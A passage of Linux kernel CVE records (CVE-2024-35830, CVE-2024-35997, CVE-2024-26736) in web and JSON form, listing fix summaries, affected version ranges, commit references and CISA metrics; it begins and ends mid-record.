              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.311",
                  "versionStartIncluding": "4.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.273",
                  "versionStartIncluding": "4.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.214",
                  "versionStartIncluding": "4.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.153",
                  "versionStartIncluding": "4.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.83",
                  "versionStartIncluding": "4.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.23",
                  "versionStartIncluding": "4.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.11",
                  "versionStartIncluding": "4.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.2",
                  "versionStartIncluding": "4.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "4.3",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: tc358743: register v4l2 async device only after successful setup\n\nEnsure the device has been setup correctly before registering the v4l2\nasync device, thus allowing userspace to access."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:06:21.297Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/17c2650de14842c25c569cbb2126c421489a3a24"
        },
        {
          "url": "https://git.kernel.org/stable/c/daf21394f9898fb9f0698c3e50de08132d2164e6"
        },
        {
          "url": "https://git.kernel.org/stable/c/610f20e5cf35ca9c0992693cae0dd8643ce932e7"
        },
        {
          "url": "https://git.kernel.org/stable/c/b8505a1aee8f1edc9d16d72ae09c93de086e2a1a"
        },
        {
          "url": "https://git.kernel.org/stable/c/8ba8db9786b55047df5ad3db3e01dd886687a77d"
        },
        {
          "url": "https://git.kernel.org/stable/c/edbb3226c985469a2f8eb69885055c9f5550f468"
        },
        {
          "url": "https://git.kernel.org/stable/c/c915c46a25c3efb084c4f5e69a053d7f7a635496"
        },
        {
          "url": "https://git.kernel.org/stable/c/4f1490a5d7a0472ee5d9f36547bc4ba46be755c7"
        },
        {
          "url": "https://git.kernel.org/stable/c/87399f1ff92203d65f1febf5919429f4bb613a02"
        }
      ],
      "title": "media: tc358743: register v4l2 async device only after successful setup",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35830",
    "datePublished": "2024-05-17T13:41:19.675Z",
    "dateReserved": "2024-05-17T12:19:12.348Z",
    "dateUpdated": "2025-05-04T09:06:21.297Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35997 (GCVE-0-2024-35997)

Vulnerability from cvelistv5 – Published: 2024-05-20 09:48 – Updated: 2025-05-04 09:10

Title

HID: i2c-hid: remove I2C_HID_READ_PENDING flag to prevent lock-up

Summary

In the Linux kernel, the following vulnerability has been resolved: HID: i2c-hid: remove I2C_HID_READ_PENDING flag to prevent lock-up The flag I2C_HID_READ_PENDING is used to serialize I2C operations. However, this is not necessary, because I2C core already has its own locking for that. More importantly, this flag can cause a lock-up: if the flag is set in i2c_hid_xfer() and an interrupt happens, the interrupt handler (i2c_hid_irq) will check this flag and return immediately without doing anything, then the interrupt handler will be invoked again in an infinite loop. Since interrupt handler is an RT task, it takes over the CPU and the flag-clearing task never gets scheduled, thus we have a lock-up. Delete this unnecessary flag.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/21bfca822cfc1e717…
	https://git.kernel.org/stable/c/c448a9fd50f77e8fb…
	https://git.kernel.org/stable/c/5095b93021b899f54…
	https://git.kernel.org/stable/c/b65fb50e04a95eec3…
	https://git.kernel.org/stable/c/0561b65fbd53d3e78…
	https://git.kernel.org/stable/c/29e94f295bad5be59…
	https://git.kernel.org/stable/c/418c5575d56410c6e…
	https://git.kernel.org/stable/c/9c0f59e47a90c54d0…

Impacted products

Vendor

Product

Version

Linux

Affected: 4a200c3b9a40242652b5734630bdd0bcf3aca75f , < 21bfca822cfc1e71796124e93b46e0d9fa584401 (git)
Affected: 4a200c3b9a40242652b5734630bdd0bcf3aca75f , < c448a9fd50f77e8fb9156ff64848aa4295eb3003 (git)
Affected: 4a200c3b9a40242652b5734630bdd0bcf3aca75f , < 5095b93021b899f54c9355bebf36d78854c33a22 (git)
Affected: 4a200c3b9a40242652b5734630bdd0bcf3aca75f , < b65fb50e04a95eec34a9d1bc138454a98a5578d8 (git)
Affected: 4a200c3b9a40242652b5734630bdd0bcf3aca75f , < 0561b65fbd53d3e788c5b0222d9112ca016fd6a1 (git)
Affected: 4a200c3b9a40242652b5734630bdd0bcf3aca75f , < 29e94f295bad5be59cf4271a93e22cdcf5536722 (git)
Affected: 4a200c3b9a40242652b5734630bdd0bcf3aca75f , < 418c5575d56410c6e186ab727bf32ae32447d497 (git)
Affected: 4a200c3b9a40242652b5734630bdd0bcf3aca75f , < 9c0f59e47a90c54d0153f8ddc0f80d7a36207d0e (git)

Linux

Affected: 3.8
Unaffected: 0 , < 3.8 (semver)
Unaffected: 4.19.313 , ≤ 4.19.* (semver)
Unaffected: 5.4.275 , ≤ 5.4.* (semver)
Unaffected: 5.10.216 , ≤ 5.10.* (semver)
Unaffected: 5.15.158 , ≤ 5.15.* (semver)
Unaffected: 6.1.90 , ≤ 6.1.* (semver)
Unaffected: 6.6.30 , ≤ 6.6.* (semver)
Unaffected: 6.8.9 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "c448a9fd50f7",
                "status": "affected",
                "version": "4a200c3b9a40",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "b65fb50e04a9",
                "status": "affected",
                "version": "4a200c3b9a40",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "5095b93021b8",
                "status": "affected",
                "version": "4a200c3b9a40",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "21bfca822cfc",
                "status": "affected",
                "version": "4a200c3b9a40",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "29e94f295bad",
                "status": "affected",
                "version": "4a200c3b9a40",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "418c5575d564",
                "status": "affected",
                "version": "4a200c3b9a40",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThanOrEqual": "9c0f59e47a90",
                "status": "affected",
                "version": "4a200c3b9a40",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "affected",
                "version": "3.8"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "3.8",
                "status": "unaffected",
                "version": "0",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThanOrEqual": "4.20",
                "status": "unaffected",
                "version": "4.19.313",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThanOrEqual": "5.5",
                "status": "unaffected",
                "version": "5.4.275",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThanOrEqual": "5.11",
                "status": "unaffected",
                "version": "5.10.216",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThanOrEqual": "5.16",
                "status": "unaffected",
                "version": "5.15.158",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThanOrEqual": "6.2",
                "status": "unaffected",
                "version": "6.1.90",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThanOrEqual": "6.7",
                "status": "unaffected",
                "version": "6.6.30",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThanOrEqual": "6.9",
                "status": "unaffected",
                "version": "6.8.9",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "6.9"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "0561b65fbd53",
                "status": "affected",
                "version": "0",
                "versionType": "custom"
              }
            ]
          }
        ],
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35997",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-01-16T21:06:56.094266Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-01-16T21:08:33.482Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:30:12.481Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/21bfca822cfc1e71796124e93b46e0d9fa584401"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c448a9fd50f77e8fb9156ff64848aa4295eb3003"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5095b93021b899f54c9355bebf36d78854c33a22"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b65fb50e04a95eec34a9d1bc138454a98a5578d8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0561b65fbd53d3e788c5b0222d9112ca016fd6a1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/29e94f295bad5be59cf4271a93e22cdcf5536722"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/418c5575d56410c6e186ab727bf32ae32447d497"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9c0f59e47a90c54d0153f8ddc0f80d7a36207d0e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/hid/i2c-hid/i2c-hid-core.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "21bfca822cfc1e71796124e93b46e0d9fa584401",
              "status": "affected",
              "version": "4a200c3b9a40242652b5734630bdd0bcf3aca75f",
              "versionType": "git"
            },
            {
              "lessThan": "c448a9fd50f77e8fb9156ff64848aa4295eb3003",
              "status": "affected",
              "version": "4a200c3b9a40242652b5734630bdd0bcf3aca75f",
              "versionType": "git"
            },
            {
              "lessThan": "5095b93021b899f54c9355bebf36d78854c33a22",
              "status": "affected",
              "version": "4a200c3b9a40242652b5734630bdd0bcf3aca75f",
              "versionType": "git"
            },
            {
              "lessThan": "b65fb50e04a95eec34a9d1bc138454a98a5578d8",
              "status": "affected",
              "version": "4a200c3b9a40242652b5734630bdd0bcf3aca75f",
              "versionType": "git"
            },
            {
              "lessThan": "0561b65fbd53d3e788c5b0222d9112ca016fd6a1",
              "status": "affected",
              "version": "4a200c3b9a40242652b5734630bdd0bcf3aca75f",
              "versionType": "git"
            },
            {
              "lessThan": "29e94f295bad5be59cf4271a93e22cdcf5536722",
              "status": "affected",
              "version": "4a200c3b9a40242652b5734630bdd0bcf3aca75f",
              "versionType": "git"
            },
            {
              "lessThan": "418c5575d56410c6e186ab727bf32ae32447d497",
              "status": "affected",
              "version": "4a200c3b9a40242652b5734630bdd0bcf3aca75f",
              "versionType": "git"
            },
            {
              "lessThan": "9c0f59e47a90c54d0153f8ddc0f80d7a36207d0e",
              "status": "affected",
              "version": "4a200c3b9a40242652b5734630bdd0bcf3aca75f",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/hid/i2c-hid/i2c-hid-core.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.8"
            },
            {
              "lessThan": "3.8",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.313",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.275",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.216",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.158",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.90",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.30",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.313",
                  "versionStartIncluding": "3.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.275",
                  "versionStartIncluding": "3.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.216",
                  "versionStartIncluding": "3.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.158",
                  "versionStartIncluding": "3.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.90",
                  "versionStartIncluding": "3.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.30",
                  "versionStartIncluding": "3.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.9",
                  "versionStartIncluding": "3.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "3.8",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nHID: i2c-hid: remove I2C_HID_READ_PENDING flag to prevent lock-up\n\nThe flag I2C_HID_READ_PENDING is used to serialize I2C operations.\nHowever, this is not necessary, because I2C core already has its own\nlocking for that.\n\nMore importantly, this flag can cause a lock-up: if the flag is set in\ni2c_hid_xfer() and an interrupt happens, the interrupt handler\n(i2c_hid_irq) will check this flag and return immediately without doing\nanything, then the interrupt handler will be invoked again in an\ninfinite loop.\n\nSince interrupt handler is an RT task, it takes over the CPU and the\nflag-clearing task never gets scheduled, thus we have a lock-up.\n\nDelete this unnecessary flag."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:10:11.851Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/21bfca822cfc1e71796124e93b46e0d9fa584401"
        },
        {
          "url": "https://git.kernel.org/stable/c/c448a9fd50f77e8fb9156ff64848aa4295eb3003"
        },
        {
          "url": "https://git.kernel.org/stable/c/5095b93021b899f54c9355bebf36d78854c33a22"
        },
        {
          "url": "https://git.kernel.org/stable/c/b65fb50e04a95eec34a9d1bc138454a98a5578d8"
        },
        {
          "url": "https://git.kernel.org/stable/c/0561b65fbd53d3e788c5b0222d9112ca016fd6a1"
        },
        {
          "url": "https://git.kernel.org/stable/c/29e94f295bad5be59cf4271a93e22cdcf5536722"
        },
        {
          "url": "https://git.kernel.org/stable/c/418c5575d56410c6e186ab727bf32ae32447d497"
        },
        {
          "url": "https://git.kernel.org/stable/c/9c0f59e47a90c54d0153f8ddc0f80d7a36207d0e"
        }
      ],
      "title": "HID: i2c-hid: remove I2C_HID_READ_PENDING flag to prevent lock-up",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35997",
    "datePublished": "2024-05-20T09:48:00.363Z",
    "dateReserved": "2024-05-17T13:50:33.148Z",
    "dateUpdated": "2025-05-04T09:10:11.851Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26736 (GCVE-0-2024-26736)

Vulnerability from cvelistv5 – Published: 2024-04-03 17:00 – Updated: 2025-05-04 08:55

Title

afs: Increase buffer size in afs_update_volume_status()

Summary

In the Linux kernel, the following vulnerability has been resolved: afs: Increase buffer size in afs_update_volume_status() The max length of volume->vid value is 20 characters. So increase idbuf[] size up to 24 to avoid overflow. Found by Linux Verification Center (linuxtesting.org) with SVACE. [DH: Actually, it's 20 + NUL, so increase it to 24 and use snprintf()]

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/5c27d85a69fa16a08…
	https://git.kernel.org/stable/c/d9b5e2b7a81968503…
	https://git.kernel.org/stable/c/e56662160fc24d28c…
	https://git.kernel.org/stable/c/e8530b170e4640172…
	https://git.kernel.org/stable/c/6e6065dd25b661420…
	https://git.kernel.org/stable/c/d34a5e57632bb5ff8…
	https://git.kernel.org/stable/c/6ea38e2aeb72349ca…

Impacted products

Vendor

Product

Version

Linux

Affected: d2ddc776a4581d900fc3bdc7803b403daae64d88 , < 5c27d85a69fa16a08813ba37ddfb4bbc9a1ed6b5 (git)
Affected: d2ddc776a4581d900fc3bdc7803b403daae64d88 , < d9b5e2b7a8196850383c70d099bfd39e81ab6637 (git)
Affected: d2ddc776a4581d900fc3bdc7803b403daae64d88 , < e56662160fc24d28cb75ac095cc6415ae1bda43e (git)
Affected: d2ddc776a4581d900fc3bdc7803b403daae64d88 , < e8530b170e464017203e3b8c6c49af6e916aece1 (git)
Affected: d2ddc776a4581d900fc3bdc7803b403daae64d88 , < 6e6065dd25b661420fac19c34282b6c626fcd35e (git)
Affected: d2ddc776a4581d900fc3bdc7803b403daae64d88 , < d34a5e57632bb5ff825196ddd9a48ca403626dfa (git)
Affected: d2ddc776a4581d900fc3bdc7803b403daae64d88 , < 6ea38e2aeb72349cad50e38899b0ba6fbcb2af3d (git)

Linux

Affected: 4.15
Unaffected: 0 , < 4.15 (semver)
Unaffected: 5.4.270 , ≤ 5.4.* (semver)
Unaffected: 5.10.211 , ≤ 5.10.* (semver)
Unaffected: 5.15.150 , ≤ 5.15.* (semver)
Unaffected: 6.1.80 , ≤ 6.1.* (semver)
Unaffected: 6.6.19 , ≤ 6.6.* (semver)
Unaffected: 6.7.7 , ≤ 6.7.* (semver)
Unaffected: 6.8 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26736",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-04-05T17:35:04.677455Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:48:32.562Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:14:12.959Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5c27d85a69fa16a08813ba37ddfb4bbc9a1ed6b5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d9b5e2b7a8196850383c70d099bfd39e81ab6637"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e56662160fc24d28cb75ac095cc6415ae1bda43e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e8530b170e464017203e3b8c6c49af6e916aece1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6e6065dd25b661420fac19c34282b6c626fcd35e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d34a5e57632bb5ff825196ddd9a48ca403626dfa"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6ea38e2aeb72349cad50e38899b0ba6fbcb2af3d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/afs/volume.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "5c27d85a69fa16a08813ba37ddfb4bbc9a1ed6b5",
              "status": "affected",
              "version": "d2ddc776a4581d900fc3bdc7803b403daae64d88",
              "versionType": "git"
            },
            {
              "lessThan": "d9b5e2b7a8196850383c70d099bfd39e81ab6637",
              "status": "affected",
              "version": "d2ddc776a4581d900fc3bdc7803b403daae64d88",
              "versionType": "git"
            },
            {
              "lessThan": "e56662160fc24d28cb75ac095cc6415ae1bda43e",
              "status": "affected",
              "version": "d2ddc776a4581d900fc3bdc7803b403daae64d88",
              "versionType": "git"
            },
            {
              "lessThan": "e8530b170e464017203e3b8c6c49af6e916aece1",
              "status": "affected",
              "version": "d2ddc776a4581d900fc3bdc7803b403daae64d88",
              "versionType": "git"
            },
            {
              "lessThan": "6e6065dd25b661420fac19c34282b6c626fcd35e",
              "status": "affected",
              "version": "d2ddc776a4581d900fc3bdc7803b403daae64d88",
              "versionType": "git"
            },
            {
              "lessThan": "d34a5e57632bb5ff825196ddd9a48ca403626dfa",
              "status": "affected",
              "version": "d2ddc776a4581d900fc3bdc7803b403daae64d88",
              "versionType": "git"
            },
            {
              "lessThan": "6ea38e2aeb72349cad50e38899b0ba6fbcb2af3d",
              "status": "affected",
              "version": "d2ddc776a4581d900fc3bdc7803b403daae64d88",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/afs/volume.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.15"
            },
            {
              "lessThan": "4.15",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.270",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.211",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.150",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.80",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.19",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.8",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.270",
